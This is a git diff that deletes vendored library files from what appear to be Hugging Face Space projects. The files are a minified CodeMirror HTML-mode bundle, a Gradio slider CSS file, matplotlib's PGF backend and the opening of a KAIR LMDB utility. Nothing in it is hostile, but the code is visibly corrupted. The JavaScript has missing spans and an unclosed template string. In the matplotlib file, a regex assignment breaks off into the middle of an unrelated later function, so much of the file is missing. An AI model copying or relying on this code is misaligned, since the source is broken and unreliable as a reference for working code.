p=O.lastChild;if(!p||!p.type.isError||p.fromhe(a,r)}const me=[{tag:"script",attrs:e=>e.type=="text/typescript"||e.lang=="ts",parser:we.parser},{tag:"script",attrs:e=>e.type=="text/babel"||e.type=="text/jsx",parser:Ce.parser},{tag:"script",attrs:e=>e.type=="text/typescript-jsx",parser:Qe.parser},{tag:"script",attrs(e){return!e.type||/^(?:text|application)\/(?:x-)?(?:java|ecma)script$|^module$|^$/i.test(e.type)},parser:K.parser},{tag:"style",attrs(e){return(!e.lang||e.lang=="css")&&(!e.type||/^(text\/)?(x-)?(stylesheet|css)$/i.test(e.type))},parser:F.parser}],Se=[{name:"style",parser:F.parser.configure({top:"Styles"})}].concat(ce.map(e=>({name:e,parser:K.parser}))),_=Ve.define({name:"html",parser:ht.configure({props:[xe.add({Element(e){let t=/^(\s*)(<\/)?/.exec(e.textAfter);return e.node.to<=e.pos+t[0].length?e.continue():e.lineIndent(e.node.from)+(t[2]?0:e.unit)},"OpenTag CloseTag SelfClosingTag"(e){return e.column(e.node.from)+e.unit},Document(e){if(e.pos+/\s*/.exec(e.textAfter)[0].lengthe.getChild("TagName")})],wrap:ue(me,Se)}),languageData:{commentTokens:{block:{open:""}},indentOnInput:/^\s*<\/\w+\W$/,wordChars:"-._"}});function Yt(e={}){let t="",l;e.matchClosingTags===!1&&(t="noMatch"),e.selfClosingTags===!0&&(t=(t?t+" ":"")+"selfClosing"),(e.nestedLanguages&&e.nestedLanguages.length||e.nestedAttributes&&e.nestedAttributes.length)&&(l=ue((e.nestedLanguages||[]).concat(me),(e.nestedAttributes||[]).concat(Se)));let a=l||t?_.configure({dialect:t,wrap:l}):_;return new ve(a,[_.data.of({autocomplete:Tt(e)}),e.autoCloseTags!==!1?bt:[],Ae().support,$e().support])}const L=new Set("area base br col command embed frame hr img input keygen link meta param source track wbr menuitem".split(" ")),bt=qe.inputHandler.of((e,t,l,a)=>{if(e.composing||e.state.readOnly||t!=l||a!=">"&&a!="/"||!_.isActiveAt(e.state,t,-1))return!1;let{state:r}=e,n=r.changeByRange(o=>{var O,p,h;let{head:i}=o,u=z(r).resolveInner(i,-1),c;if((u.name=="TagName"||u.name=="StartTag")&&(u=u.parent),a==">"&&u.name=="OpenTag"){if(((p=(O=u.parent)===null||O===void 0?void 0:O.lastChild)===null||p===void 0?void 0:p.name)!="CloseTag"&&(c=g(r.doc,u.parent,i))&&!L.has(c)){let d=e.state.doc.sliceString(i,i+1)===">",f=`${d?"":">"}`;return{range:G.cursor(i+1),changes:{from:i+(d?1:0),insert:f}}}}else if(a=="/"&&u.name=="OpenTag"){let d=u.parent,f=d?.parent;if(d.from==i-1&&((h=f.lastChild)===null||h===void 0?void 0:h.name)!="CloseTag"&&(c=g(r.doc,f,i))&&!L.has(c)){let P=e.state.doc.sliceString(i,i+1)===">",T=`/${c}${P?"":">"}`,x=i+T.length+(P?1:0);return{range:G.cursor(x),changes:{from:i,insert:T}}}}return{range:o}});return n.changes.empty?!1:(e.dispatch(n,{userEvent:"input.type",scrollIntoView:!0}),!0)});export{bt as autoCloseTags,Yt as html,kt as htmlCompletionSource,Tt as htmlCompletionSourceWith,_ as htmlLanguage}; -//# sourceMappingURL=index-9923ca49.js.map diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-de9ed39e.css b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-de9ed39e.css deleted file mode 100644 index 463d37a8a75c97e2c4ecd3aaf5081dd8a2f90164..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-de9ed39e.css +++ /dev/null @@ -1 +0,0 @@ -.rangeSlider{--pip:var(--range-pip, lightslategray);--pip-text:var(--range-pip-text, var(--pip));--pip-active:var(--range-pip-active, 
darkslategrey);--pip-active-text:var(--range-pip-active-text, var(--pip-active));--pip-hover:var(--range-pip-hover, darkslategrey);--pip-hover-text:var(--range-pip-hover-text, var(--pip-hover));--pip-in-range:var(--range-pip-in-range, var(--pip-active));--pip-in-range-text:var(--range-pip-in-range-text, var(--pip-active-text))}.rangePips{position:absolute;height:1em;left:0;right:0;bottom:-1em}.rangePips.vertical{height:auto;width:1em;inset:0 auto 0 100%}.rangePips .pip{height:.4em;position:absolute;top:.25em;width:1px;white-space:nowrap}.rangePips.vertical .pip{height:1px;width:.4em;left:.25em;top:auto;bottom:auto}.rangePips .pipVal{position:absolute;top:.4em;transform:translate(-50%,25%)}.rangePips.vertical .pipVal{position:absolute;top:0;left:.4em;transform:translate(25%,-50%)}.rangePips .pip{transition:all .15s ease}.rangePips .pipVal{transition:all .15s ease,font-weight 0s linear}.rangePips .pip{color:#789;color:var(--pip-text);background-color:#789;background-color:var(--pip)}.rangePips .pip.selected{color:#2f4f4f;color:var(--pip-active-text);background-color:#2f4f4f;background-color:var(--pip-active)}.rangePips.hoverable:not(.disabled) .pip:hover{color:#2f4f4f;color:var(--pip-hover-text);background-color:#2f4f4f;background-color:var(--pip-hover)}.rangePips .pip.in-range{color:#2f4f4f;color:var(--pip-in-range-text);background-color:#2f4f4f;background-color:var(--pip-in-range)}.rangePips .pip.selected{height:.75em}.rangePips.vertical .pip.selected{height:1px;width:.75em}.rangePips .pip.selected .pipVal{font-weight:700;top:.75em}.rangePips.vertical .pip.selected .pipVal{top:0;left:.75em}.rangePips.hoverable:not(.disabled) .pip:not(.selected):hover{transition:none}.rangePips.hoverable:not(.disabled) .pip:not(.selected):hover .pipVal{transition:none;font-weight:700}.rangeSlider{--slider:var(--range-slider, #d7dada);--handle-inactive:var(--range-handle-inactive, #99a2a2);--handle:var(--range-handle, #838de7);--handle-focus:var(--range-handle-focus, #4a40d4);--handle-border:var(--range-handle-border, var(--handle));--range-inactive:var(--range-range-inactive, var(--handle-inactive));--range:var(--range-range, var(--handle-focus));--float-inactive:var(--range-float-inactive, var(--handle-inactive));--float:var(--range-float, var(--handle-focus));--float-text:var(--range-float-text, white)}.rangeSlider{position:relative;border-radius:100px;height:.5em;margin:1em;transition:opacity .2s ease;user-select:none}.rangeSlider *{user-select:none}.rangeSlider.pips{margin-bottom:1.8em}.rangeSlider.pip-labels{margin-bottom:2.8em}.rangeSlider.vertical{display:inline-block;border-radius:100px;width:.5em;min-height:200px}.rangeSlider.vertical.pips{margin-right:1.8em;margin-bottom:1em}.rangeSlider.vertical.pip-labels{margin-right:2.8em;margin-bottom:1em}.rangeSlider .rangeHandle{position:absolute;display:block;height:1.4em;width:1.4em;top:.25em;bottom:auto;transform:translateY(-50%) translate(-50%);z-index:2}.rangeSlider.reversed .rangeHandle{transform:translateY(-50%) translate(50%)}.rangeSlider.vertical .rangeHandle{left:.25em;top:auto;transform:translateY(50%) translate(-50%)}.rangeSlider.vertical.reversed .rangeHandle{transform:translateY(-50%) translate(-50%)}.rangeSlider .rangeNub,.rangeSlider .rangeHandle:before{position:absolute;left:0;top:0;display:block;border-radius:10em;height:100%;width:100%;transition:box-shadow .2s ease}.rangeSlider .rangeHandle:before{content:"";inset:1px;height:auto;width:auto;box-shadow:0 0 0 0 var(--handle-border);opacity:0}.rangeSlider.hoverable:not(.disabled) 
.rangeHandle:hover:before{box-shadow:0 0 0 8px var(--handle-border);opacity:.2}.rangeSlider.hoverable:not(.disabled) .rangeHandle.press:before,.rangeSlider.hoverable:not(.disabled) .rangeHandle.press:hover:before{box-shadow:0 0 0 12px var(--handle-border);opacity:.4}.rangeSlider.range:not(.min):not(.max) .rangeNub{border-radius:10em 10em 10em 1.6em}.rangeSlider.range .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(-135deg)}.rangeSlider.range .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(45deg)}.rangeSlider.range.reversed .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(45deg)}.rangeSlider.range.reversed .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(-135deg)}.rangeSlider.range.vertical .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(135deg)}.rangeSlider.range.vertical .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(-45deg)}.rangeSlider.range.vertical.reversed .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(-45deg)}.rangeSlider.range.vertical.reversed .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(135deg)}.rangeSlider .rangeFloat{display:block;position:absolute;left:50%;top:-.5em;transform:translate(-50%,-100%);font-size:1em;text-align:center;opacity:0;pointer-events:none;white-space:nowrap;transition:all .2s ease;font-size:.9em;padding:.2em .4em;border-radius:.2em}.rangeSlider .rangeHandle.active .rangeFloat,.rangeSlider.hoverable .rangeHandle:hover .rangeFloat{opacity:1;top:-.2em;transform:translate(-50%,-100%)}.rangeSlider .rangeBar{position:absolute;display:block;transition:background .2s ease;border-radius:1em;height:.5em;top:0;user-select:none;z-index:1}.rangeSlider.vertical .rangeBar{width:.5em;height:auto}.rangeSlider{background-color:#d7dada;background-color:var(--slider)}.rangeSlider .rangeBar{background-color:#99a2a2;background-color:var(--range-inactive)}.rangeSlider.focus .rangeBar{background-color:#838de7;background-color:var(--range)}.rangeSlider .rangeNub{background-color:#99a2a2;background-color:var(--handle-inactive)}.rangeSlider.focus .rangeNub{background-color:#838de7;background-color:var(--handle)}.rangeSlider .rangeHandle.active .rangeNub{background-color:#4a40d4;background-color:var(--handle-focus)}.rangeSlider .rangeFloat{color:#fff;color:var(--float-text);background-color:#99a2a2;background-color:var(--float-inactive)}.rangeSlider.focus .rangeFloat{background-color:#4a40d4;background-color:var(--float)}.rangeSlider.disabled{opacity:.5}.rangeSlider.disabled .rangeNub{background-color:#d7dada;background-color:var(--slider)}.mic-wrap.svelte-1thnwz{padding:var(--size-2)}.record-icon.svelte-1thnwz{display:flex;position:relative;margin-right:var(--size-2);width:6px;height:6px}.dot.svelte-1thnwz{display:inline-flex;position:relative;border-radius:var(--radius-full);background:var(--color-red-500);width:6px;height:6px}.pinger.svelte-1thnwz{display:inline-flex;position:absolute;opacity:.9;animation:svelte-1thnwz-ping 1s cubic-bezier(0,0,.2,1) infinite;border-radius:var(--radius-full);background:var(--color-red-500);width:var(--size-full);height:var(--size-full)}@keyframes svelte-1thnwz-ping{75%,to{transform:scale(2);opacity:0}}audio.svelte-1thnwz{padding:var(--size-2);width:var(--size-full);height:var(--size-14)}audio.svelte-eemfgq{padding:var(--size-2);width:var(--size-full);height:var(--size-14)} diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/backends/backend_pgf.py 
b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/backends/backend_pgf.py deleted file mode 100644 index 7312f300a57bd1ac12f4a61afd1c96e726d04c60..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/backends/backend_pgf.py +++ /dev/null @@ -1,1056 +0,0 @@ -import codecs -import datetime -import functools -from io import BytesIO -import logging -import math -import os -import pathlib -import re -import shutil -import subprocess -from tempfile import TemporaryDirectory -import weakref - -from PIL import Image - -import matplotlib as mpl -from matplotlib import _api, cbook, font_manager as fm -from matplotlib.backend_bases import ( - _Backend, FigureCanvasBase, FigureManagerBase, RendererBase -) -from matplotlib.backends.backend_mixed import MixedModeRenderer -from matplotlib.backends.backend_pdf import ( - _create_pdf_info_dict, _datetime_to_pdf) -from matplotlib.path import Path -from matplotlib.figure import Figure -from matplotlib._pylab_helpers import Gcf - -_log = logging.getLogger(__name__) - - -# Note: When formatting floating point values, it is important to use the -# %f/{:f} format rather than %s/{} to avoid triggering scientific notation, -# which is not recognized by TeX. - - -@_api.caching_module_getattr -class __getattr__: - NO_ESCAPE = _api.deprecated("3.6", obj_type="")( - property(lambda self: _NO_ESCAPE)) - re_mathsep = _api.deprecated("3.6", obj_type="")( - property(lambda self: _split_math.__self__)) - - -@_api.deprecated("3.6") -def get_fontspec(): - """Build fontspec preamble from rc.""" - with mpl.rc_context({"pgf.preamble": ""}): - return _get_preamble() - - -@_api.deprecated("3.6") -def get_preamble(): - """Get LaTeX preamble from rc.""" - return mpl.rcParams["pgf.preamble"] - - -def _get_preamble(): - """Prepare a LaTeX preamble based on the rcParams configuration.""" - preamble = [mpl.rcParams["pgf.preamble"]] - if mpl.rcParams["pgf.texsystem"] != "pdflatex": - preamble.append("\\usepackage{fontspec}") - if mpl.rcParams["pgf.rcfonts"]: - families = ["serif", "sans\\-serif", "monospace"] - commands = ["setmainfont", "setsansfont", "setmonofont"] - for family, command in zip(families, commands): - # 1) Forward slashes also work on Windows, so don't mess with - # backslashes. 2) The dirname needs to include a separator. - path = pathlib.Path(fm.findfont(family)) - preamble.append(r"\%s{%s}[Path=\detokenize{%s/}]" % ( - command, path.name, path.parent.as_posix())) - preamble.append(mpl.texmanager._usepackage_if_not_loaded( - "underscore", option="strings")) # Documented as "must come last". - return "\n".join(preamble) - - -# It's better to use only one unit for all coordinates, since the -# arithmetic in latex seems to produce inaccurate conversions. -latex_pt_to_in = 1. / 72.27 -latex_in_to_pt = 1. / latex_pt_to_in -mpl_pt_to_in = 1. / 72. -mpl_in_to_pt = 1. / mpl_pt_to_in - - -_NO_ESCAPE = r"(? 
3 else 1.0 - - if has_fill: - _writeln(self.fh, - r"\definecolor{currentfill}{rgb}{%f,%f,%f}" - % tuple(rgbFace[:3])) - _writeln(self.fh, r"\pgfsetfillcolor{currentfill}") - if has_fill and fillopacity != 1.0: - _writeln(self.fh, r"\pgfsetfillopacity{%f}" % fillopacity) - - # linewidth and color - lw = gc.get_linewidth() * mpl_pt_to_in * latex_in_to_pt - stroke_rgba = gc.get_rgb() - _writeln(self.fh, r"\pgfsetlinewidth{%fpt}" % lw) - _writeln(self.fh, - r"\definecolor{currentstroke}{rgb}{%f,%f,%f}" - % stroke_rgba[:3]) - _writeln(self.fh, r"\pgfsetstrokecolor{currentstroke}") - if strokeopacity != 1.0: - _writeln(self.fh, r"\pgfsetstrokeopacity{%f}" % strokeopacity) - - # line style - dash_offset, dash_list = gc.get_dashes() - if dash_list is None: - _writeln(self.fh, r"\pgfsetdash{}{0pt}") - else: - _writeln(self.fh, - r"\pgfsetdash{%s}{%fpt}" - % ("".join(r"{%fpt}" % dash for dash in dash_list), - dash_offset)) - - def _print_pgf_path(self, gc, path, transform, rgbFace=None): - f = 1. / self.dpi - # check for clip box / ignore clip for filled paths - bbox = gc.get_clip_rectangle() if gc else None - maxcoord = 16383 / 72.27 * self.dpi # Max dimensions in LaTeX. - if bbox and (rgbFace is None): - p1, p2 = bbox.get_points() - clip = (max(p1[0], -maxcoord), max(p1[1], -maxcoord), - min(p2[0], maxcoord), min(p2[1], maxcoord)) - else: - clip = (-maxcoord, -maxcoord, maxcoord, maxcoord) - # build path - for points, code in path.iter_segments(transform, clip=clip): - if code == Path.MOVETO: - x, y = tuple(points) - _writeln(self.fh, - r"\pgfpathmoveto{\pgfqpoint{%fin}{%fin}}" % - (f * x, f * y)) - elif code == Path.CLOSEPOLY: - _writeln(self.fh, r"\pgfpathclose") - elif code == Path.LINETO: - x, y = tuple(points) - _writeln(self.fh, - r"\pgfpathlineto{\pgfqpoint{%fin}{%fin}}" % - (f * x, f * y)) - elif code == Path.CURVE3: - cx, cy, px, py = tuple(points) - coords = cx * f, cy * f, px * f, py * f - _writeln(self.fh, - r"\pgfpathquadraticcurveto" - r"{\pgfqpoint{%fin}{%fin}}{\pgfqpoint{%fin}{%fin}}" - % coords) - elif code == Path.CURVE4: - c1x, c1y, c2x, c2y, px, py = tuple(points) - coords = c1x * f, c1y * f, c2x * f, c2y * f, px * f, py * f - _writeln(self.fh, - r"\pgfpathcurveto" - r"{\pgfqpoint{%fin}{%fin}}" - r"{\pgfqpoint{%fin}{%fin}}" - r"{\pgfqpoint{%fin}{%fin}}" - % coords) - - # apply pgf decorators - sketch_params = gc.get_sketch_params() if gc else None - if sketch_params is not None: - # Only "length" directly maps to "segment length" in PGF's API. - # PGF uses "amplitude" to pass the combined deviation in both x- - # and y-direction, while matplotlib only varies the length of the - # wiggle along the line ("randomness" and "length" parameters) - # and has a separate "scale" argument for the amplitude. 
- # -> Use "randomness" as PRNG seed to allow the user to force the - # same shape on multiple sketched lines - scale, length, randomness = sketch_params - if scale is not None: - # make matplotlib and PGF rendering visually similar - length *= 0.5 - scale *= 2 - # PGF guarantees that repeated loading is a no-op - _writeln(self.fh, r"\usepgfmodule{decorations}") - _writeln(self.fh, r"\usepgflibrary{decorations.pathmorphing}") - _writeln(self.fh, r"\pgfkeys{/pgf/decoration/.cd, " - f"segment length = {(length * f):f}in, " - f"amplitude = {(scale * f):f}in}}") - _writeln(self.fh, f"\\pgfmathsetseed{{{int(randomness)}}}") - _writeln(self.fh, r"\pgfdecoratecurrentpath{random steps}") - - def _pgf_path_draw(self, stroke=True, fill=False): - actions = [] - if stroke: - actions.append("stroke") - if fill: - actions.append("fill") - _writeln(self.fh, r"\pgfusepath{%s}" % ",".join(actions)) - - def option_scale_image(self): - # docstring inherited - return True - - def option_image_nocomposite(self): - # docstring inherited - return not mpl.rcParams['image.composite_image'] - - def draw_image(self, gc, x, y, im, transform=None): - # docstring inherited - - h, w = im.shape[:2] - if w == 0 or h == 0: - return - - if not os.path.exists(getattr(self.fh, "name", "")): - raise ValueError( - "streamed pgf-code does not support raster graphics, consider " - "using the pgf-to-pdf option") - - # save the images to png files - path = pathlib.Path(self.fh.name) - fname_img = "%s-img%d.png" % (path.stem, self.image_counter) - Image.fromarray(im[::-1]).save(path.parent / fname_img) - self.image_counter += 1 - - # reference the image in the pgf picture - _writeln(self.fh, r"\begin{pgfscope}") - self._print_pgf_clip(gc) - f = 1. / self.dpi # from display coords to inch - if transform is None: - _writeln(self.fh, - r"\pgfsys@transformshift{%fin}{%fin}" % (x * f, y * f)) - w, h = w * f, h * f - else: - tr1, tr2, tr3, tr4, tr5, tr6 = transform.frozen().to_values() - _writeln(self.fh, - r"\pgfsys@transformcm{%f}{%f}{%f}{%f}{%fin}{%fin}" % - (tr1 * f, tr2 * f, tr3 * f, tr4 * f, - (tr5 + x) * f, (tr6 + y) * f)) - w = h = 1 # scale is already included in the transform - interp = str(transform is None).lower() # interpolation in PDF reader - _writeln(self.fh, - r"\pgftext[left,bottom]" - r"{%s[interpolate=%s,width=%fin,height=%fin]{%s}}" % - (_get_image_inclusion_command(), - interp, w, h, fname_img)) - _writeln(self.fh, r"\end{pgfscope}") - - def draw_tex(self, gc, x, y, s, prop, angle, *, mtext=None): - # docstring inherited - self.draw_text(gc, x, y, s, prop, angle, ismath="TeX", mtext=mtext) - - def draw_text(self, gc, x, y, s, prop, angle, ismath=False, mtext=None): - # docstring inherited - - # prepare string for tex - s = _escape_and_apply_props(s, prop) - - _writeln(self.fh, r"\begin{pgfscope}") - - alpha = gc.get_alpha() - if alpha != 1.0: - _writeln(self.fh, r"\pgfsetfillopacity{%f}" % alpha) - _writeln(self.fh, r"\pgfsetstrokeopacity{%f}" % alpha) - rgb = tuple(gc.get_rgb())[:3] - _writeln(self.fh, r"\definecolor{textcolor}{rgb}{%f,%f,%f}" % rgb) - _writeln(self.fh, r"\pgfsetstrokecolor{textcolor}") - _writeln(self.fh, r"\pgfsetfillcolor{textcolor}") - s = r"\color{textcolor}" + s - - dpi = self.figure.dpi - text_args = [] - if mtext and ( - (angle == 0 or - mtext.get_rotation_mode() == "anchor") and - mtext.get_verticalalignment() != "center_baseline"): - # if text anchoring can be supported, get the original coordinates - # and add alignment information - pos = mtext.get_unitless_position() - x, y = 
mtext.get_transform().transform(pos) - halign = {"left": "left", "right": "right", "center": ""} - valign = {"top": "top", "bottom": "bottom", - "baseline": "base", "center": ""} - text_args.extend([ - f"x={x/dpi:f}in", - f"y={y/dpi:f}in", - halign[mtext.get_horizontalalignment()], - valign[mtext.get_verticalalignment()], - ]) - else: - # if not, use the text layout provided by Matplotlib. - text_args.append(f"x={x/dpi:f}in, y={y/dpi:f}in, left, base") - - if angle != 0: - text_args.append("rotate=%f" % angle) - - _writeln(self.fh, r"\pgftext[%s]{%s}" % (",".join(text_args), s)) - _writeln(self.fh, r"\end{pgfscope}") - - def get_text_width_height_descent(self, s, prop, ismath): - # docstring inherited - # get text metrics in units of latex pt, convert to display units - w, h, d = (LatexManager._get_cached_or_new() - .get_width_height_descent(s, prop)) - # TODO: this should be latex_pt_to_in instead of mpl_pt_to_in - # but having a little bit more space around the text looks better, - # plus the bounding box reported by LaTeX is VERY narrow - f = mpl_pt_to_in * self.dpi - return w * f, h * f, d * f - - def flipy(self): - # docstring inherited - return False - - def get_canvas_width_height(self): - # docstring inherited - return (self.figure.get_figwidth() * self.dpi, - self.figure.get_figheight() * self.dpi) - - def points_to_pixels(self, points): - # docstring inherited - return points * mpl_pt_to_in * self.dpi - - -class FigureCanvasPgf(FigureCanvasBase): - filetypes = {"pgf": "LaTeX PGF picture", - "pdf": "LaTeX compiled PGF picture", - "png": "Portable Network Graphics", } - - def get_default_filetype(self): - return 'pdf' - - def _print_pgf_to_fh(self, fh, *, bbox_inches_restore=None): - - header_text = """%% Creator: Matplotlib, PGF backend -%% -%% To include the figure in your LaTeX document, write -%% \\input{.pgf} -%% -%% Make sure the required packages are loaded in your preamble -%% \\usepackage{pgf} -%% -%% Also ensure that all the required font packages are loaded; for instance, -%% the lmodern package is sometimes necessary when using math font. -%% \\usepackage{lmodern} -%% -%% Figures using additional raster images can only be included by \\input if -%% they are in the same directory as the main LaTeX file. 
For loading figures -%% from other directories you can use the `import` package -%% \\usepackage{import} -%% -%% and then include the figures with -%% \\import{}{.pgf} -%% -""" - - # append the preamble used by the backend as a comment for debugging - header_info_preamble = ["%% Matplotlib used the following preamble"] - for line in _get_preamble().splitlines(): - header_info_preamble.append("%% " + line) - header_info_preamble.append("%%") - header_info_preamble = "\n".join(header_info_preamble) - - # get figure size in inch - w, h = self.figure.get_figwidth(), self.figure.get_figheight() - dpi = self.figure.dpi - - # create pgfpicture environment and write the pgf code - fh.write(header_text) - fh.write(header_info_preamble) - fh.write("\n") - _writeln(fh, r"\begingroup") - _writeln(fh, r"\makeatletter") - _writeln(fh, r"\begin{pgfpicture}") - _writeln(fh, - r"\pgfpathrectangle{\pgfpointorigin}{\pgfqpoint{%fin}{%fin}}" - % (w, h)) - _writeln(fh, r"\pgfusepath{use as bounding box, clip}") - renderer = MixedModeRenderer(self.figure, w, h, dpi, - RendererPgf(self.figure, fh), - bbox_inches_restore=bbox_inches_restore) - self.figure.draw(renderer) - - # end the pgfpicture environment - _writeln(fh, r"\end{pgfpicture}") - _writeln(fh, r"\makeatother") - _writeln(fh, r"\endgroup") - - def print_pgf(self, fname_or_fh, **kwargs): - """ - Output pgf macros for drawing the figure so it can be included and - rendered in latex documents. - """ - with cbook.open_file_cm(fname_or_fh, "w", encoding="utf-8") as file: - if not cbook.file_requires_unicode(file): - file = codecs.getwriter("utf-8")(file) - self._print_pgf_to_fh(file, **kwargs) - - def print_pdf(self, fname_or_fh, *, metadata=None, **kwargs): - """Use LaTeX to compile a pgf generated figure to pdf.""" - w, h = self.figure.get_size_inches() - - info_dict = _create_pdf_info_dict('pgf', metadata or {}) - pdfinfo = ','.join( - _metadata_to_str(k, v) for k, v in info_dict.items()) - - # print figure to pgf and compile it with latex - with TemporaryDirectory() as tmpdir: - tmppath = pathlib.Path(tmpdir) - self.print_pgf(tmppath / "figure.pgf", **kwargs) - (tmppath / "figure.tex").write_text( - "\n".join([ - r"\documentclass[12pt]{article}", - r"\usepackage[pdfinfo={%s}]{hyperref}" % pdfinfo, - r"\usepackage[papersize={%fin,%fin}, margin=0in]{geometry}" - % (w, h), - r"\usepackage{pgf}", - _get_preamble(), - r"\begin{document}", - r"\centering", - r"\input{figure.pgf}", - r"\end{document}", - ]), encoding="utf-8") - texcommand = mpl.rcParams["pgf.texsystem"] - cbook._check_and_log_subprocess( - [texcommand, "-interaction=nonstopmode", "-halt-on-error", - "figure.tex"], _log, cwd=tmpdir) - with (tmppath / "figure.pdf").open("rb") as orig, \ - cbook.open_file_cm(fname_or_fh, "wb") as dest: - shutil.copyfileobj(orig, dest) # copy file contents to target - - def print_png(self, fname_or_fh, **kwargs): - """Use LaTeX to compile a pgf figure to pdf and convert it to png.""" - converter = make_pdf_to_png_converter() - with TemporaryDirectory() as tmpdir: - tmppath = pathlib.Path(tmpdir) - pdf_path = tmppath / "figure.pdf" - png_path = tmppath / "figure.png" - self.print_pdf(pdf_path, **kwargs) - converter(pdf_path, png_path, dpi=self.figure.dpi) - with png_path.open("rb") as orig, \ - cbook.open_file_cm(fname_or_fh, "wb") as dest: - shutil.copyfileobj(orig, dest) # copy file contents to target - - def get_renderer(self): - return RendererPgf(self.figure, None) - - def draw(self): - self.figure.draw_without_rendering() - return super().draw() - - 
-FigureManagerPgf = FigureManagerBase - - -@_Backend.export -class _BackendPgf(_Backend): - FigureCanvas = FigureCanvasPgf - - -class PdfPages: - """ - A multi-page PDF file using the pgf backend - - Examples - -------- - >>> import matplotlib.pyplot as plt - >>> # Initialize: - >>> with PdfPages('foo.pdf') as pdf: - ... # As many times as you like, create a figure fig and save it: - ... fig = plt.figure() - ... pdf.savefig(fig) - ... # When no figure is specified the current figure is saved - ... pdf.savefig() - """ - __slots__ = ( - '_output_name', - 'keep_empty', - '_n_figures', - '_file', - '_info_dict', - '_metadata', - ) - - def __init__(self, filename, *, keep_empty=True, metadata=None): - """ - Create a new PdfPages object. - - Parameters - ---------- - filename : str or path-like - Plots using `PdfPages.savefig` will be written to a file at this - location. Any older file with the same name is overwritten. - - keep_empty : bool, default: True - If set to False, then empty pdf files will be deleted automatically - when closed. - - metadata : dict, optional - Information dictionary object (see PDF reference section 10.2.1 - 'Document Information Dictionary'), e.g.: - ``{'Creator': 'My software', 'Author': 'Me', 'Title': 'Awesome'}``. - - The standard keys are 'Title', 'Author', 'Subject', 'Keywords', - 'Creator', 'Producer', 'CreationDate', 'ModDate', and - 'Trapped'. Values have been predefined for 'Creator', 'Producer' - and 'CreationDate'. They can be removed by setting them to `None`. - - Note that some versions of LaTeX engines may ignore the 'Producer' - key and set it to themselves. - """ - self._output_name = filename - self._n_figures = 0 - self.keep_empty = keep_empty - self._metadata = (metadata or {}).copy() - self._info_dict = _create_pdf_info_dict('pgf', self._metadata) - self._file = BytesIO() - - def _write_header(self, width_inches, height_inches): - pdfinfo = ','.join( - _metadata_to_str(k, v) for k, v in self._info_dict.items()) - latex_header = "\n".join([ - r"\documentclass[12pt]{article}", - r"\usepackage[pdfinfo={%s}]{hyperref}" % pdfinfo, - r"\usepackage[papersize={%fin,%fin}, margin=0in]{geometry}" - % (width_inches, height_inches), - r"\usepackage{pgf}", - _get_preamble(), - r"\setlength{\parindent}{0pt}", - r"\begin{document}%", - ]) - self._file.write(latex_header.encode('utf-8')) - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - self.close() - - def close(self): - """ - Finalize this object, running LaTeX in a temporary directory - and moving the final pdf file to *filename*. - """ - self._file.write(rb'\end{document}\n') - if self._n_figures > 0: - self._run_latex() - elif self.keep_empty: - open(self._output_name, 'wb').close() - self._file.close() - - def _run_latex(self): - texcommand = mpl.rcParams["pgf.texsystem"] - with TemporaryDirectory() as tmpdir: - tex_source = pathlib.Path(tmpdir, "pdf_pages.tex") - tex_source.write_bytes(self._file.getvalue()) - cbook._check_and_log_subprocess( - [texcommand, "-interaction=nonstopmode", "-halt-on-error", - tex_source], - _log, cwd=tmpdir) - shutil.move(tex_source.with_suffix(".pdf"), self._output_name) - - def savefig(self, figure=None, **kwargs): - """ - Save a `.Figure` to this file as a new page. - - Any other keyword arguments are passed to `~.Figure.savefig`. - - Parameters - ---------- - figure : `.Figure` or int, default: the active figure - The figure, or index of the figure, that is saved to the file. 
- """ - if not isinstance(figure, Figure): - if figure is None: - manager = Gcf.get_active() - else: - manager = Gcf.get_fig_manager(figure) - if manager is None: - raise ValueError("No figure {}".format(figure)) - figure = manager.canvas.figure - - try: - orig_canvas = figure.canvas - figure.canvas = FigureCanvasPgf(figure) - - width, height = figure.get_size_inches() - if self._n_figures == 0: - self._write_header(width, height) - else: - # \pdfpagewidth and \pdfpageheight exist on pdftex, xetex, and - # luatex<0.85; they were renamed to \pagewidth and \pageheight - # on luatex>=0.85. - self._file.write( - br'\newpage' - br'\ifdefined\pdfpagewidth\pdfpagewidth' - br'\else\pagewidth\fi=%ain' - br'\ifdefined\pdfpageheight\pdfpageheight' - br'\else\pageheight\fi=%ain' - b'%%\n' % (width, height) - ) - - figure.savefig(self._file, format="pgf", **kwargs) - self._n_figures += 1 - finally: - figure.canvas = orig_canvas - - def get_pagecount(self): - """Return the current number of pages in the multipage pdf file.""" - return self._n_figures diff --git a/spaces/lambdalabs/LambdaSuperRes/KAIR/utils/utils_lmdb.py b/spaces/lambdalabs/LambdaSuperRes/KAIR/utils/utils_lmdb.py deleted file mode 100644 index 75192c346bb9c0b96f8b09635ed548bd6e797d89..0000000000000000000000000000000000000000 --- a/spaces/lambdalabs/LambdaSuperRes/KAIR/utils/utils_lmdb.py +++ /dev/null @@ -1,205 +0,0 @@ -import cv2 -import lmdb -import sys -from multiprocessing import Pool -from os import path as osp -from tqdm import tqdm - - -def make_lmdb_from_imgs(data_path, - lmdb_path, - img_path_list, - keys, - batch=5000, - compress_level=1, - multiprocessing_read=False, - n_thread=40, - map_size=None): - """Make lmdb from images. - - Contents of lmdb. The file structure is: - example.lmdb - ├── data.mdb - ├── lock.mdb - ├── meta_info.txt - - The data.mdb and lock.mdb are standard lmdb files and you can refer to - https://lmdb.readthedocs.io/en/release/ 